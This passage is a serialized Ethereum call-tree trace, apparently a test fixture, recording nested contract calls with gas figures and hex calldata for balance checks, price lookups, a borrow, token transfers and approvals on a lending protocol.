"gas_cost": 13739,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 915378,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 950368,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 976290,
"gas_cost": 3073,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 959272,
"gas_cost": 1105,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 971534,
"gas_cost": 3195,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x976aa93ca5aaa569109f4267589c619a097f001d"),
"value": 0,
"depth": 0,
"gas_limit": 954544,
"gas_cost": 1180,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x922018674c12a7f0d394ebeef9b58f186cde13c1"),
"value": 0,
"depth": 0,
"gas_limit": 966655,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 962207,
"gas_cost": 274012,
"calldata": HexBytes(
"0xc5ebeaec000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x976aa93ca5aaa569109f4267589c619a097f001d"),
"value": 0,
"depth": 0,
"gas_limit": 945272,
"gas_cost": 271908,
"calldata": HexBytes(
"0xc5ebeaec000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"value": 0,
"depth": 0,
"gas_limit": 920348,
"gas_cost": 193142,
"calldata": HexBytes(
"0xda3d454c000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 904186,
"gas_cost": 191162,
"calldata": HexBytes(
"0xda3d454c000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 884632,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 874714,
"gas_cost": 7747,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003437612e40a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a5acfef01d00971b81cbd9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 863610,
"gas_cost": 2843,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000001ac09e6fd9f7658000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 855477,
"gas_cost": 20072,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 839816,
"gas_cost": 16646,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0xbb8be4772faa655c255309afc3c5207aa7b896fd"
),
"value": 0,
"depth": 0,
"gas_limit": 824243,
"gas_cost": 13461,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 805923,
"gas_cost": 1215,
"calldata": HexBytes(
"0x0bebac860000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000120826dfebe6c4e87c468e0"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 803124,
"gas_cost": 1093,
"calldata": HexBytes(
"0xc92aecc4"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000034a13ac9ed2cf6900e592bb"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 832241,
"gas_cost": 2931,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000df84bed7768e000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 824021,
"gas_cost": 16641,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 808852,
"gas_cost": 13215,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x338f7e5d19d9953b76dd81446b142c2d9fe03482"
),
"value": 0,
"depth": 0,
"gas_limit": 793763,
"gas_cost": 10030,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984"
),
"value": 0,
"depth": 0,
"gas_limit": 775967,
"gas_cost": 1497,
"calldata": HexBytes(
"0x70a0823100000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000acca862cc8349fcf261ae"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 804162,
"gas_cost": 3635,
"calldata": HexBytes(
"0xfc57d4df00000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000033a760c1363e2000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 795248,
"gas_cost": 19027,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 780986,
"gas_cost": 16924,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 766332,
"gas_cost": 13739,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 746233,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 773040,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 763892,
"gas_cost": 1087,
"calldata": HexBytes("0xaa5af0fd"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000e80cfd37ffe1008"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 759180,
"gas_cost": 1154,
"calldata": HexBytes("0x47bd3718"),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000001d139751603c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 739864,
"gas_cost": 9329,
"calldata": HexBytes(
"0x95dd9193000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000026cf3ea6a100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 726410,
"gas_cost": 7205,
"calldata": HexBytes(
"0x0933c1ed0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002495dd9193000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000026cf3ea6a1"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 712609,
"gas_cost": 4248,
"calldata": HexBytes(
"0x95dd9193000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000026cf3ea6a1"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 726999,
"gas_cost": 1488,
"calldata": HexBytes(
"0x70a082310000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000801eaf5e13a6e0f06f7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 723862,
"gas_cost": 19090,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000064fdb83b0307d50"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 726950,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 716812,
"gas_cost": 34601,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"value": 0,
"depth": 0,
"gas_limit": 666827,
"gas_cost": 2261,
"calldata": HexBytes(
"0x5c778605000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 654627,
"gas_cost": 354,
"calldata": HexBytes(
"0x5c778605000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 690550,
"gas_cost": 1148,
"calldata": HexBytes("0x6f307dc3"),
"returndata": HexBytes(
"0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x637726f8b08a7abe3ae3acab01a80e2d8ddef77b"),
"value": 0,
"depth": 0,
"gas_limit": 687473,
"gas_cost": 1136,
"calldata": HexBytes(
"0x41d6e7da0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 684589,
"gas_cost": 1148,
"calldata": HexBytes("0x6f307dc3"),
"returndata": HexBytes(
"0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x1b14e8d511c9a4395425314f849bd737baf8208f"),
"value": 0,
"depth": 0,
"gas_limit": 681635,
"gas_cost": 1299,
"calldata": HexBytes(
"0xb371deac0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 677584,
"gas_cost": 15401,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e080000000000000000000000000000000000000000000000000000000003473bc0"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 659519,
"gas_cost": 4160,
"calldata": HexBytes(
"0x095ea7b300000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef0000000000000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 652917,
"gas_cost": 24353,
"calldata": HexBytes(
"0x095ea7b300000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef000000000000000000000000000000000000000000000000000000051c062040"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x4ba1f38427b33b8ab7bb0490200dae1f1c36823f"),
"value": 0,
"depth": 0,
"gas_limit": 626856,
"gas_cost": 1155,
"calldata": HexBytes(
"0x00c045f000000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x4ba1f38427b33b8ab7bb0490200dae1f1c36823f"),
"value": 0,
"depth": 0,
"gas_limit": 623811,
"gas_cost": 1177,
"calldata": HexBytes(
"0x05eb98f200000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x61935cbdd02287b511119ddb11aeb42f1593b7ef"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 609943,
"gas_cost": 172105,
"calldata": HexBytes(
"0xa6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000